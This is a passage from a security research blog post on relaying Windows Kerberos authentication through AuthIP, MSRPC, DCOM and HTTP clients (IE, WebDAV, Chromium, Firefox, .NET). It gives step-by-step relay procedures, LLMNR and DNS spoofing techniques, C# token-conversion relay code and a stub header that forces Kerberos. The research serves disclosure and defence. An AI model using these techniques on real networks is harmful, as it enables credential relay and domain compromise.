The first potential issue is Negotiate is by far the most likely package in use as it allows a network protocol the flexibility to use the most appropriate authentication protocol that the client and server both support. However, what happens if the client uses the raw Kerberos package but the server uses Negotiate?

This isn't a problem as the server implementation of Negotiate will pass the input token to the function NegpDetermineTokenPackage in lsasrv.dll during the first call to AcceptSecurityContext. This function detects if the client has passed a GSS-API Kerberos token (or NTLM) and enables a pass through mode where Negotiate gets out of the way. Therefore even if the client uses the Kerberos package you can still authenticate to the server and keep the client happy without having to extract the inner authentication token or wrap up response tokens.

One actual issue for relaying is the Negotiate protocol enables integrity protection (equivalent to passing ISC_REQ_INTEGRITY to the underlying package) so that it can generate a Message Integrity Code (MIC) for the authentication exchange to prevent tampering. Using the Kerberos package directly won't add integrity protection automatically. Therefore relaying Kerberos AP_REQs from Negotiate will likely hit issues related to automatic enabling of signing on the server. It is possible for a client to explicitly disable automatic integrity checking by passing the ISC_REQ_NO_INTEGRITY request attribute, but that's not a common case.

It's possible to disable Negotiate from the relay if the client passes an arbitrary authentication token to the first call of the InitializeSecurityContext API. On the first call the Negotiate implementation will call the NegpDetermineTokenPackage function to determine whether to enable authentication pass through. If the initial token is NTLM or looks like a Kerberos token then it'll pass through directly to the underlying security package and it won't set ISC_REQ_INTEGRITY, unless the client explicitly requested it. The byte sequence [0x00, 0x01, 0x40] is sufficient to get Negotiate to detect Kerberos, and the token is then discarded so it doesn't have to contain any further valid data.

Sniffing and Proxying Traffic

Before going into individual protocols that I've researched, it's worth discussing some more obvious ways of getting access to Kerberos authentication targeted at other services. First is sniffing network traffic sent from client to the server. For example, if the Kerberos AP_REQ is sent to a service over an unencrypted network protocol and the attacker can view that traffic the AP_REQ could be extracted and relayed. The selection of the SPN will be based on the expected traffic so the attacker doesn't need to do anything to influence it.

The Kerberos authentication protocol has protections against this attack vector. The Kerberos AP_REQ doesn't just contain the service ticket, it's also accompanied by an Authenticator which is encrypted using the ticket's session key. This key is accessible by both the legitimate client and the service. The authenticator contains a timestamp of when it was generated, and the service can check if this authenticator is within an allowable time range and whether it has seen the timestamp already. This allows the service to reject replayed authenticators by caching recently received values, and the allowable time window prevents the attacker waiting for any cache to expire before replaying.

What this means is that while an attacker could sniff the Kerberos authentication on the wire and relay it, if the service has already received the authenticator it would be rejected as being a replay. The only way to exploit it would be to somehow prevent the legitimate authentication request from reaching the service, or race the request so that the attacker's packet is processed first.

Note, RFC4120 mentions the possibility of embedding the client's network address in the authenticator so that the service could reject authentication coming from the wrong host. This isn't used by the Windows Kerberos implementation as far as I can tell. No doubt it would cause too many false positives for the replay protection in anything but the simplest enterprise networks.

Therefore the only reliable way to exploit this scenario would be to actively interpose on the network communications between the client and service. This is of course practical and has been demonstrated many times assuming the traffic isn't protected using something like TLS with server verification. Various attacks would be possible such as ARP or DNS spoofing attacks or HTTP proxy redirection to perform the interposition of the traffic.

However, active MitM of protocols is a known risk and therefore an enterprise might have technical defenses in place to mitigate the issue. Of course, if such enterprises have enabled all the recommended relay protections,it's a moot point. Regardless, we'll assume that MitM is impractical for existing services due to protections in place and consider how individual protocols handle SPN selection.

IPSec and AuthIP

My research into Kerberos authentication relay came about in part because I was looking into the implementation of IPSec on Windows as part of my firewall research. Specifically I was researching the AuthIP ISAKMP which allows for Windows authentication protocols to be used to establish IPsec Security Associations.

I noticed that the AuthIP protocol has a GSS-ID payload which can be sent from the server to the client. This payload contains the textual SPN to use for the Kerberos authentication during the AuthIP process. This SPN is passed verbatim to the SSPI InitializeSecurityContext call by the AuthIP client.

As no verification is done on the format of the SPN in the GSS-ID payload, it allows the attacker to fully control the values including the service class and instance name. Therefore if an attacker can induce a domain joined machine to connect to an attacker controlled service and negotiate AuthIP then a Kerberos AP_REQ for an arbitrary SPN can be captured for relay use. As this AP_REQ is never sent to the target of the SPN it will not be detected as a replay.

Inducing authentication isn't necessarily difficult. Any IP traffic which is covered by the domain configured security connection rules will attempt to perform AuthIP. For example it's possible that a UDP response for a DNS request from the domain controller might be sufficient. AuthIP supports two authenticated users, the machine and the calling user. By default it seems the machine authenticates first, so if you convinced a Domain Controller to authenticate you'd get the DC computer account which could be fairly exploitable.

For interest's sake, the SPN is also used to determine the computer account associated with the server. This computer account is then used with Service For User (S4U) to generate a local access token allowing the client to determine the identity of the server. However I don't think this is that useful as the fake server can't complete the authentication and the connection will be discarded.

The security connection rules use IP address ranges to determine what hosts need IPsec authentication. If these address ranges are too broad it's also possible that ISAKMP AuthIP traffic might leak to external networks. For example if the rules don't limit the network ranges to the enterprise's addresses, then even a connection out to a public service could be accompanied by the ISAKMP AuthIP packet. This can be then exploited by an attacker who is not co-located on the enterprise network just by getting a client to connect to their server, such as through a web URL.

Diagram of a relay using a fake AuthIP server

To summarize the attack process from the diagram:

  1. Induce a client computer to send some network traffic to EVILHOST. It doesn't really matter what the traffic is, only that the IP address, type and port must match an IP security connection rule to use AuthIP. EVILHOST does not need to be domain joined to perform the attack.
  2. The network traffic will get the Windows IPsec client to try and establish a security association with the target host.
  3. A fake AuthIP server on the target host receives the request to establish a security association and returns a GSS-ID payload. This payload contains the target SPN, for example CIFS/FILESERVER.
  4. The IPsec client uses the SPN to create an AP_REQ token and sends it to EVILHOST.
  5. EVILHOST relays the Kerberos AP_REQ to the target service on FILESERVER.

Relaying this AuthIP authentication isn't ideal from an attacker's perspective. As the authentication will be used to sign and seal the network traffic, the request context flags for the call to InitializeSecurityContext will require integrity and confidentiality protection. For network protocols such as LDAP which default to requiring signing and sealing if the client supports it, this would prevent the relay attack from working. However if the service ignores the protection and doesn't have any further checks in place this would be sufficient.

This issue was reported to MSRC and assigned case number 66900. However Microsoft have indicated that it will not be fixed with a security bulletin. I've described Microsoft's rationale for not fixing this issue later in the blog post. If you want to reproduce this issue there's details on Project Zero's issue tracker.

MSRPC

After discovering that AuthIP could allow for authentication relay the next protocol I looked at is MSRPC. The protocol supports NTLM, Kerberos or Negotiate authentication protocols over connected network transports such as named pipes or TCP. These authentication protocols need to be opted into by the server using the RpcServerRegisterAuthInfo API by specifying the authentication service constants of RPC_C_AUTHN_WINNT, RPC_C_AUTHN_GSS_KERBEROS or RPC_C_AUTHN_GSS_NEGOTIATE respectively. When registering the authentication information the server can optionally specify the SPN that needs to be used by the client.

However, this SPN isn't actually used by the RPC server itself. Instead it's registered with the runtime, and a client can query the server's SPN using the RpcMgmtInqServerPrincName management API. Once the SPN is queried the client can configure its authentication for the connection using the RpcBindingSetAuthInfo API. However, this isn't required; the client could just generate the SPN manually and set it. If the client doesn't call RpcBindingSetAuthInfo then it will not perform any authentication on the RPC connection.

Aside, curiously when a connection is made to the server it can query the client's authentication information using the RpcBindingInqAuthClient API. However, the SPN that this API returns is the one registered by RpcServerRegisterAuthInfo and NOT the one which was used by the client to authenticate. Also Microsoft does mention the call to RpcMgmtInqServerPrincName in the "Writing a secure RPC client or server" section on MSDN. However they frame it in the context of mutual authentication and not to protect against a relay attack.

If a client queries for the SPN from a malicious RPC server it will authenticate using a Kerberos AP_REQ for an SPN fully under the attacker's control. Whether the AP_REQ has integrity or confidentiality enabled depends on the authentication level set during the call to RpcBindingSetAuthInfo. If this is set to RPC_C_AUTHN_LEVEL_CONNECT and the client uses RPC_C_AUTHN_GSS_KERBEROS then the AP_REQ won't have integrity enabled. However, if Negotiate is used or anything above RPC_C_AUTHN_LEVEL_CONNECT as a level is used then it will have the integrity/confidentiality flags set.

Doing a quick scan in system32 the following DLLs call the RpcMgmtInqServerPrincName API: certcli.dll, dot3api.dll, dusmsvc.dll, FrameServerClient.dll, L2SecHC.dll, luiapi.dll, msdtcprx.dll, nlaapi.dll, ntfrsapi.dll, w32time.dll, WcnApi.dll, WcnEapAuthProxy.dll, WcnEapPeerProxy.dll, witnesswmiv2provider.dll, wlanapi.dll, wlanext.exe, WLanHC.dll, wlanmsm.dll, wlansvc.dll, wwansvc.dll, wwapi.dll. Some basic analysis shows that none of these clients check the value of the SPN and use it verbatim with RpcBindingSetAuthInfo. That said, they all seem to use RPC_C_AUTHN_GSS_NEGOTIATE and set the authentication level to RPC_C_AUTHN_LEVEL_PKT_PRIVACY which makes them less useful as an attack vector.

If the client specifies RPC_C_AUTHN_GSS_NEGOTIATE but does not specify an SPN then the runtime generates one automatically. This is based on the target hostname with the RestrictedKrbHost service class. The runtime doesn't process the hostname, it just concatenates strings and for some reason the runtime doesn't support generating the SPN for RPC_C_AUTHN_GSS_KERBEROS.

One additional quirk of the RPC runtime is that the request attribute flag ISC_REQ_USE_DCE_STYLE is used when calling InitializeSecurityContext. This enables a special three-leg authentication mode which results in the server sending back an AP_RET and then receiving another AP_RET from the client. Until that third AP_RET has been provided to the server it won't consider the authentication complete so it's not sufficient to just forward the initial AP_REQ token and close the connection to the client. This just makes the relay code slightly more complex but not impossible.

A second change that ISC_REQ_USE_DCE_STYLE introduces is that the Kerberos AP_REQ token does not have an GSS-API wrapper. This causes the call to NegpDetermineTokenPackage to fail to detect the package in use, making it impossible to directly forward the traffic to a server using the Negotiate package. However, this prefix is not protected against modification so the relay code can append the appropriate value before forwarding to the server. For example the following C# code can be used to convert a DCE style AP_REQ to a GSS-API format which Negotiate will accept.

public static byte[] EncodeLength(int length)

{

    if (length < 0x80)

        return new byte[] { (byte)length };

    if (length < 0x100)

        return new byte[] { 0x81, (byte)length };

    if (length < 0x10000)

        return new byte[] { 0x82, (byte)(length >> 8),

                            (byte)(length & 0xFF) };

    throw new ArgumentException("Invalid length", nameof(length));

}

public static byte[] ConvertApReq(byte[] token)

{

    if (token.Length == 0 || token[0] != 0x6E)

        return token;

    MemoryStream stm = new MemoryStream();

    BinaryWriter writer = new BinaryWriter(stm);

    Console.WriteLine("Converting DCE AP_REQ to GSS-API format.");

    byte[] header = new byte[] { 0x06, 0x09, 0x2a, 0x86, 0x48,

       0x86, 0xf7, 0x12, 0x01, 0x02, 0x02, 0x01, 0x00 };

    writer.Write((byte)0x60);

    writer.Write(EncodeLength(header.Length + token.Length));

    writer.Write(header);

    writer.Write(token);

    return stm.ToArray();

}

Subsequent tokens in the authentication process don't need to be wrapped; in fact, wrapping them with their GSS-API headers will cause the authentication to fail. Relaying MSRPC requests would probably be difficult just due to the relative lack of clients which request the server's SPN. Also when the SPN is requested it tends to be a conscious act of securing the client and so best practice tends to require the developer to set the maximum authentication level, making the Kerberos AP_REQ less useful.

DCOM

The DCOM protocol uses MSRPC under the hood to access remote COM objects, therefore it should have the same behavior as MSRPC. The big difference is DCOM is designed to automatically handle the authentication requirements of a remote COM object through binding information contained in the DUALSTRINGARRAY returned during Object Exporter ID (OXID) resolving. Therefore the client doesn't need to explicitly call RpcBindingSetAuthInfo to configure the authentication.

The binding information contains the protocol sequence and endpoint to use (such as TCP on port 30000) as well as the security bindings. Each security binding contains the RPC authentication service (wAuthnSvc in the below screenshot) to use as well as an optional SPN (aPrincName) for the authentication. Therefore a malicious DCOM server can force the client to use the RPC_C_AUTHN_GSS_KERBEROS authentication service with a completely arbitrary SPN by returning an appropriate security binding.

Screenshot of part of the MS-DCOM protocol documentation showing the SECURITYBINDING structure

The authentication level chosen by the client depends on the value of the dwAuthnLevel parameter specified if the COM client calls the CoInitializeSecurity API. If the client doesn't explicitly call CoInitializeSecurity then a default will be used which is currently RPC_C_AUTHN_LEVEL_CONNECT. This means neither integrity or confidentiality will be enforced on the Kerberos AP_REQ by default.

One limitation is that without a call to CoInitializeSecurity, the default impersonation level for the client is set to RPC_C_IMP_LEVEL_IDENTIFY. This means the access token generated by the DCOM RPC authentication can only be used for identification and not for impersonation. For some services this isn't an issue, for example LDAP doesn't need an impersonation level token. However for others such as SMB this would prevent access to files. It's possible that you could find a COM client which sets both RPC_C_AUTHN_LEVEL_CONNECT and RPC_C_IMP_LEVEL_IMPERSONATE though there's no trivial process to assess that.

Getting a client to connect to the server isn't trivial as DCOM isn't a widely used protocol on modern Windows networks due to high authentication requirements. However, one use case for this is local privilege escalation. For example you could get a privileged service to connect to the malicious COM server and relay the computer account Kerberos AP_REQ which is generated. I have a working PoC for this which allows a local non-admin user to connect to the domain's LDAP server using the local computer's credentials.

This attack is somewhat similar to the RemotePotato attack (which uses NTLM rather than Kerberos) which again Microsoft have refused to fix. I'll describe this in more detail in a separate blog post after this one.

HTTP

HTTP has supported NTLM and Negotiate authentication for a long time (see this draft from 2002 although the most recent RFC is 4559 from 2006). To initiate a Windows authentication session the server can respond to a request with the status code 401 and specify a WWW-Authenticate header with the value Negotiate. If the client supports Windows authentication it can use InitializeSecurityContext to generate a token, convert the binary token into a Base64 string and send it in the next request to the server with the Authorization header. This process is repeated until the client errors or the authentication succeeds.

In theory only NTLM and Negotiate are defined but a HTTP implementation could use other Windows authentication packages such as Kerberos if it so chose to. Whether the HTTP client will automatically use the user's credentials is up to the user agent or the developer using it as a library.

All the major browsers support both authentication types as well as many non browser HTTP user agents such as those in .NET and WinHTTP. I looked at the following implementations, all running on Windows 10 21H1:

  • WinINET (Internet Explorer 11)
  • WinHTTP (WebClient)
  • Chromium M93 (Chrome and Edge)
  • Firefox 91
  • .NET Framework 4.8
  • .NET 5.0 and 6.0

This is of course not an exhaustive list, and there's likely to be many different HTTP clients in Windows which might have different behaviors. I've also not looked at how non-Windows clients work in this regard.

There's two important behaviors that I wanted to assess with HTTP. First is how the user agent determines when to perform automatic Windows authentication using the current user's credentials. In order to relay the authentication it can't ask the user for their credentials. And second we want to know how the SPN is selected by the user agent when calling InitializeSecurityContext.

WinINET (Internet Explorer 11)

WinINET can be used as a generic library to handle HTTP connections and authentication. There's likely many different users of WinINET but we'll just look at Internet Explorer 11 as that is what it's most known for. WinINET is also the originator of HTTP Negotiate authentication, so it's good to get a baseline of what WinINET does in case other libraries just copied its behavior.

First, how does WinINET determine when it should handle Windows authentication automatically? By default this is based on whether the target host is considered to be in the Intranet Zone. This means any host which bypasses the configured HTTP proxy or uses an undotted name will be considered Intranet zone and WinINET will automatically authenticate using the current user's credentials.

It's possible to disable this behavior by changing the security options for the Intranet Zone to "Prompt for user name and password", as shown below:

Screenshot of the system Internet Options Security Settings showing how to disable automatic authentication

Next, how does WinINET determine the SPN to use for Negotiate authentication? RFC4559 says the following:

'When the Kerberos Version 5 GSSAPI mechanism [RFC4121] is being used, the HTTP server will be using a principal name of the form of "HTTP/hostname"'

You might assume therefore that the HTTP URL that WinINET is connecting to would be sufficient to build the SPN: just use the hostname as provided and combine with the HTTP service class. However it turns out that's not entirely the case. I found a rough description of how IE and WinINET actually generate the SPN in this blog. This blog post is over 10 years old so it was possible that things have changed, however it turns out to not be the case.

The basic approach is that WinINET doesn't necessarily trust the hostname specified in the HTTP URL. Instead it requests the canonical name of the server via DNS. It doesn't seem to explicitly request a CNAME record from the DNS server. Instead it calls getaddrinfo and specifies the AI_CANONNAME hint. Then it uses the returned value of ai_canonname and prefixes it with the HTTP service class. In general ai_canonname is the name provided by the DNS server in the returned A/AAAA record.

For example, if the HTTP URL is http://fileserver.domain.com, but the DNS A record contains the canonical name example.domain.com the generated SPN is HTTP/example.domain.com and not HTTP/fileserver.domain.com. Therefore to provide an arbitrary SPN you need to get the name in the DNS address record to differ from the IP address in that record so that IE will connect to a server we control while generating Kerberos authentication for a different target name.

The most obvious technique would be to specify a DNS CNAME record which redirects to another hostname. However, at least if the client is using a Microsoft DNS server (which is likely for a domain environment) then the CNAME record is not directly returned to the client. Instead the DNS server will perform a recursive lookup, and then return the CNAME along with the validated address record to the client.

Therefore, if an attacker sets up a CNAME record for www.evil.com, which redirects to fileserver.domain.com the DNS server will return the CNAME record and an address record for the real IP address of fileserver.domain.com. WinINET will try to connect to the HTTP service on fileserver.domain.com rather than www.evil.com which is what is needed for the attack to function.

I tried various ways of tricking the DNS client into making a direct request to a DNS server I controlled but I couldn't seem to get it to work. However, it turns out there is a way to get the DNS resolver to accept arbitrary DNS responses, via local DNS resolution protocols such as Multicast DNS (MDNS) and Link-Local Multicast Name Resolution (LLMNR).

These two protocols use a lightly modified DNS packet structure, so you can return a response to the name resolution request with an address record with the IP address of the malicious web server, but the canonical name of any server. WinINET will then make the HTTP connection to the malicious web server but construct the SPN for the spoofed canonical name. I've verified this with LLMNR and in theory MDNS should work as well.

Is spoofing the canonical name a bug in the Windows DNS client resolver? I don't believe any DNS protocol requires the query name to exactly match the answer name. If the DNS server has a CNAME record for the queried host then there's no obvious requirement for it to return that record when it could just return the address record. Of course if a public DNS server could spoof a host for a DNS zone which it didn't control, that'd be a serious security issue. It's also worth noting that this doesn't spoof the name generally. As the cached DNS entry on Windows is based on the query name, if the client now resolves fileserver.domain.com a new DNS request will be made and the DNS server would return the real address.

Attacking local name resolution protocols is a well known weakness abused for MitM attacks, so it's likely that some security conscious networks will disable the protocols. However, the advantage of using LLMNR this way over its use for MitM is that the resolved name can be anything. As in, normally you'd want to spoof the DNS name of an existing host, in our example you'd spoof the request for the fileserver name. But for registered computers on the network the DNS client will usually satisfy the name resolution via the network's DNS server before ever trying local DNS resolution. Therefore local DNS resolution would never be triggered and it wouldn't be possible to spoof it. For relaying Kerberos authentication we don't care, you can induce a client to connect to an unregistered host name which will fallback to local DNS resolution.

The big problem with the local DNS resolution attack vector is that the attacker must be in the same multicast domain as the victim computer. However, the attacker can still start the process by getting a user to connect to an external domain which looks legitimate then redirect to an undotted name to both force automatic authentication and local DNS resolving.

Diagram of the local DNS resolving attack against WinINET

To summarize the attack process as shown in the above diagram:

  1. The attacker sets up an LLMNR service on a machine in the same multicast domain at the victim computer. The attacker listens for a target name request such as EVILHOST.
  2. Trick the victim to use IE (or another WinINET client, such as via a document format like DOCX) to connect to the attacker's server on http://EVILHOST.
  3. The LLMNR server receives the lookup request and responds by setting the address record's hostname to the SPN target host to spoof and the IP address to the attacker-controlled server.
  4. The WinINET client extracts the spoofed canonical name, appends the HTTP service class to the SPN and requests the Kerberos service ticket. This Kerberos ticket is then sent to the attacker's HTTP service.
  5. The attacker receives the Negotiate/Kerberos authentication for the spoofed SPN and relays it to the real target server.

An example LLMNR response decoded by Wireshark for the name evilhost (with IP address 10.0.0.80), spoofing fileserver.domain.com (which is not address 10.0.0.80) is shown below:

Link-local Multicast Name Resolution (response)

    Transaction ID: 0x910f

    Flags: 0x8000 Standard query response, No error

    Questions: 1

    Answer RRs: 1

    Authority RRs: 0

    Additional RRs: 0

    Queries

        evilhost: type A, class IN

            Name: evilhost

            [Name Length: 8]

            [Label Count: 1]

            Type: A (Host Address) (1)

            Class: IN (0x0001)

    Answers

        fileserver.domain.com: type A, class IN, addr 10.0.0.80

            Name: fileserver.domain.com

            Type: A (Host Address) (1)

            Class: IN (0x0001)

            Time to live: 1 (1 second)

            Data length: 4

            Address: 10.0.0.80

You might assume that the SPN always having the HTTP service class would be a problem. However, the Active Directory default SPN mapping will map HTTP to the HOST service class which is always registered. Therefore you can target any domain joined system without needing to register an explicit SPN. As long as the receiving service doesn't then verify the SPN it will work to authenticate to the computer account, which is used by privileged services. You can use the following PowerShell script to list all the configured SPN mappings in a domain.

PS> $base_dn = (Get-ADRootDSE).configurationNamingContext

PS> $dn = "CN=Directory Service,CN=Windows NT,CN=Services,$base_dn"

PS> (Get-ADObject $dn -Properties sPNMappings).sPNMappings

One interesting behavior of WinINET is that it always requests Kerberos delegation, although that will only be useful if the SPN's target account is registered for delegation. I couldn't convince WinINET to default to a Kerberos only mode; sending back a WWW-Authenticate: Kerberos header causes the authentication process to stop. This means the Kerberos AP_REQ will always have Integrity enabled even though the user agent doesn't explicitly request it.

Another user of WinINET is Office. For example you can set a template located on an HTTP URL which will generate local Windows authentication if in the Intranet zone just by opening a Word document. This is probably a good vector for getting the authentication started rather than relying on Internet Explorer being available.

WinINET does have some feature controls which can be enabled on a per-executable basis which affect the behavior of the SPN lookup process, specifically FEATURE_USE_CNAME_FOR_SPN_KB911149 and

FEATURE_ALWAYS_USE_DNS_FOR_SPN_KB3022771. However these only seem to come into play if the HTTP connection is being proxied, which we're assuming isn't the case.

WinHTTP (WebDAV WebClient)

The WinHTTP library is an alternative to using WinINET in a client application. It's a cleaner API and doesn't have the baggage of being used in Internet Explorer. As an example client I chose to use the built-in WebDAV WebClient service because it gives the interesting property that it converts a UNC file name request into a potentially exploitable HTTP request. If the WebClient service is installed and running then opening a file of the form \\EVIL\abc will cause an HTTP request to be sent out to a server under the attacker's control.

From what I can tell the behavior of WinHTTP when used with the WebClient service is almost exactly the same as for WinINET. I could exploit the SPN generation through local DNS resolution, but not from a public DNS name record. WebDAV seems to consider undotted names to be Intranet zone, however the default for WinHTTP seems to depend on whether the connection would bypass the proxy. The automatic authentication decision is based on the value of the WINHTTP_OPTION_AUTOLOGON_POLICY policy.

At least as used with WebDAV WinHTTP handles a WWW-Authenticate header of Kerberos, however it ends up using the Negotiate package regardless and so Integrity will always be enabled. It also enables Kerberos delegation automatically like WinINET.

Chromium M93

Chromium based browsers such as Chrome and Edge are open source so it's a bit easier to check the implementation. By default Chromium will automatically authenticate to intranet zone sites, it uses the same Internet Security Manager used by WinINET to make the zone determination in URLSecurityManagerWin::CanUseDefaultCredentials. An administrator can set GPOs to change this behavior to only allow automatic authentication to a set of hosts.

The SPN is generated in HttpAuthHandlerNegotiate::CreateSPN which is called from HttpAuthHandlerNegotiate::DoResolveCanonicalNameComplete. While the documentation for CreateSPN mentions it's basically a copy of the behavior in IE, it technically isn't. Instead of taking the canonical name from the initial DNS request it does a second DNS request, and the result of that is used to generate the SPN.

This second DNS request is important as it means that we now have a way of exploiting this from a public DNS name. If you set the TTL of the initial host DNS record to a very low value, then it's possible to change the DNS response between the lookup for the host to connect to and the lookup for the canonical name to use for the SPN.

This will also work with local DNS resolution as well, though in that case the response doesn't need to be switched as one response is sufficient. This second DNS lookup behavior can be disabled with a GPO. If this is disabled then neither local DNS resolution nor public DNS will work as Chromium will use the host specified in the URL for the SPN.

In a domain environment where the Chromium browser is configured to only authenticate to Intranet sites we can abuse the fact that by default authenticated users can add new DNS records to the Microsoft DNS server through LDAP (see this blog post by Kevin Robertson). Using the domain's DNS server is useful as the DNS record could be looked up using a short Intranet name rather than a public DNS name meaning it's likely to be considered a target for automatic authentication.

One problem with using LDAP to add the DNS record is the time before the DNS server will refresh its records is at least 180 seconds. This would make it difficult to switch the response from a normal address record to a CNAME record in a short enough time frame to be useful. Instead we can add an NS record to the DNS server which forwards the lookup to our own DNS server. As long as the TTL for the DNS response is short the domain's DNS server will rerequest the record and we can return different responses without any waiting for the DNS server to update from LDAP. This is very similar to DNS rebinding attack, except instead of swapping the IP address, we're swapping the canonical name.

Diagram of two DNS request attack against Chromium

Therefore a working exploit as shown in the diagram would be the following:

  1. Register an NS record with the DNS server for evilhost.domain.com using existing authenticated credentials via LDAP. Wait for the DNS server to pick up the record.
  2. Direct the browser to connect to http://evilhost. This allows Chromium to automatically authenticate as it's an undotted Intranet host. The browser will lookup evilhost.domain.com by adding its primary DNS suffix.
  3. This request goes to the client's DNS server, which then follows the NS record and performs a recursive query to the attacker's DNS server.
  4. The attacker's DNS server returns a normal address record for their HTTP server with a very short TTL.
  5. The browser makes a request to the HTTP server, at this point the attacker delays the response long enough for the cached DNS request to expire. It can then return a 401 to get the browser to authenticate.
  6. The browser makes a second DNS lookup for the canonical name. As the original request has expired, another will be made for evilhost.domain.com. For this lookup the attacker returns a CNAME record for the fileserver.domain.com target. The client's DNS server will look up the IP address for the CNAME host and return that.
  7. The browser will generate the SPN based on the CNAME record and that'll be used to generate the AP_REQ, sending it to the attacker's HTTP server.
  8. The attacker can relay the AP_REQ to the target server.

It's possible that we can combine the local and public DNS attack mechanisms to only need one DNS request. In this case we could set up an NS record to our own DNS server and get the client to resolve the hostname. The client's DNS server would do a recursive query, and at this point our DNS server shouldn't respond immediately. We could then start a classic DNS spoofing attack to return a DNS response packet directly to the client with the spoofed address record.

In general DNS spoofing is limited by requiring the source IP address, transaction ID and the UDP source port to match before the DNS client will accept the response packet. The source IP address should be spoofable on a local network and the client's IP address can be known ahead of time through an initial HTTP connection, so the only problems are the transaction ID and port.

As most clients have a relatively long timeout of 3-5 seconds, that might be enough time to try the majority of the combinations for the ID and port. Of course there isn't really a penalty for trying multiple times. If this attack was practical then you could do the attack on a local network even if local DNS resolution was disabled and enable the attack for libraries which only do a single lookup such as WinINET and WinHTTP. The response could have a long TTL, so that when the access is successful it doesn't need to be repeated for every request.

I couldn't get Chromium to downgrade Negotiate to Kerberos only so Integrity will be enabled. Also since Delegation is not enabled by default, an administrator needs to configure an allow list GPO to specify what targets are allowed to receive delegated credentials.

A bonus quirk for Chromium: It seems to be the only browser which still supports URL based user credentials. If you pass user credentials in the request and get the server to return a request for Negotiate authentication then it'll authenticate automatically regardless of the zone of the site. You can also pass credentials using XMLHttpRequest::open.

While not very practical, this can be used to test a user's password from an arbitrary host. If the username/password is correct and the SPN is spoofed then Chromium will send a validated Kerberos AP_REQ, otherwise either NTLM or no authentication will be sent.

NTLM can be always generated as it doesn't require any proof the password is valid, whereas Kerberos requires the password to be correct to allow the authentication to succeed. You need to specify the domain name when authenticating so you use a URL of the form http://DOMAIN%5CUSER:[email protected]

One other quirk of this is you can specify a fully qualified domain name (FQDN) and user name and the Windows Kerberos implementation will try and authenticate using that server based on the DNS SRV records. For example http://EVIL.COM%5CUSER:[email protected]¬†will try to authenticate to the Kerberos service specified through the _kerberos._tcp.evil.com¬†SRV record. This trick works even on non-domain joined systems to generate Kerberos authentication, however it's not clear if this trick has any practical use.

It's worth noting that I did discuss the implications of the Chromium HTTP vector with team members internally and the general conclusion that this behavior is by design as it's trying to copy the behavior expected of existing user agents such as IE. Therefore there was no expectation it would be fixed.

Firefox 91

As with Chromium, Firefox is open source so we can find the implementation. Unlike the other HTTP implementations researched up to this point, Firefox doesn't perform Windows authentication by default. An administrator needs to configure either a list of hosts that are allowed to automatically authenticate, or the network.negotiate-auth.allow-non-fqdn setting can be enabled to authenticate to non-dotted host names.

If authentication is enabled it works with both local DNS resolving and public DNS as it does a second DNS lookup when constructing the SPN for Negotiate in nsAuthSSPI::MakeSN. Unlike Chromium there doesn't seem to be a setting to disable this behavior.

Once again I couldn't get Firefox to use raw Kerberos, so Integrity is enabled. Also Delegation is not enabled unless an administrator configures the network.negotiate-auth.delegation-uris setting.

.NET Framework 4.8

The .NET Framework 4.8 officially has two HTTP libraries, the original System.Net.HttpWebRequest and derived APIs and the newer System.Net.Http.HttpClient API. However in the .NET framework the newer API uses the older one under the hood, so we'll only consider the older of the two.

Windows authentication is only generated automatically if the UseDefaultCredentials property is set to true on the HttpWebRequest object as shown below (technically this sets the CredentialCache.DefaultCredentials object, but it's easier to use the boolean property). Once the default credentials are set the client will automatically authenticate using Windows authentication to any host, it doesn't seem to care if that host is in the Intranet zone.

var request = WebRequest.CreateHttp("http://www.evil.com");

request.UseDefaultCredentials = true;

var response = (HttpWebResponse)request.GetResponse();

The SPN is generated in the System.Net.AuthenticationState.GetComputeSpn function which we can find in the .NET reference source. The SPN is built from the canonical name returned by the initial DNS lookup, which means it supports the local but not public DNS resolution. If you follow the code it does support doing a second DNS lookup if the host is undotted, however this is only if the client code sets an explicit Host header as far as I can tell. Note that the code here is slightly different in .NET 2.0 which might support looking up the canonical name as long as the host name is undotted, but I've not verified that.

The .NET Framework supports specifying Kerberos directly as the authentication type in the WWW-Authentication header. As the client code doesn't explicitly request integrity, this allows the Kerberos AP_REQ to not have Integrity enabled.

The code also supports the WWW-Authentication header having an initial token, so even if Kerberos wasn't directly supported, you could use Negotiate and specify the stub token I described at the start to force Kerberos authentication. For example returning the following header with the initial 401 status response will force Kerberos through auto-detection:

WWW-Authenticate: Negotiate AAFA

Finally, the authentication code always enables delegation regardless of the target host.

.NET 5.0

The .NET 5.0 runtime has deprecated the HttpWebRequest API in favor of the HttpClient API. It uses a new backend class called the SocketsHttpHandler. As it's all open source we can find the implementation, specifically the AuthenticationHelper class which is a complete rewrite from the .NET Framework version.

To automatically authenticate, the client code must either use the HttpClientHandler class and set the UseDefaultCredentials property as shown below. Or if using SocketsHttpHandler, set the Credentials property to the default credentials. This handler must then be specified when creating the HttpClient object.

var handler = new HttpClientHandler();

handler.UseDefaultCredentials = true;

var client = new HttpClient(handler);

await client.GetStringAsync("http://www.evil.com");

Unless the client specified an explicit Host header in the request the authentication will do a DNS lookup for the canonical name. This is separate from the DNS lookup for the HTTP connection so it supports both local and public DNS attacks.

While the implementation doesn't support Kerberos directly like the .NET Framework, it does support passing an initial token so it's still possible to force raw Kerberos which will disable the Integrity requirement.

.NET 6.0

The .NET 6.0 runtime is basically the same as .NET 5.0, except that Integrity is specified explicitly when creating the client authentication context. This means that rolling back to Kerberos no longer has any advantage. This change seems to be down to a broken implementation of NTLM on macOS and not as some anti-NTLM relay measure.

HTTP Overview

The following table summarizes the results of the HTTP protocol research:

  • The LLMNR column indicates it's possible to influence the SPN using a local DNS resolver attack
  • DNS CNAME¬†indicates a public DNS resolving attack
  • Delegation indicates the HTTP user agent enables Kerberos delegation
  • Integrity indicates that integrity protection is requested which reduces the usefulness of the relayed authentication if the target server automatically detects the setting.

User Agent

LLMNR

DNS CNAME

Delegation

Integrity

Internet Explorer 11 (WinINET)

Yes

No

Yes

Yes

WebDAV (WinHTTP)

Yes

No

Yes

Yes

Chromium (M93)

Yes

Yes

No†

Yes

Firefox 91

Yes

Yes

No†

Yes

.NET Framework 4.8

Yes

No‡

Yes

No

.NET 5.0

Yes

Yes

No

No

.NET 6.0

Yes

Yes

No

Yes

† Chromium and Firefox can enable delegation only on a per-site basis through a GPO.

‡ .NET Framework supports DNS resolving in special circumstances for non-dotted hostnames.

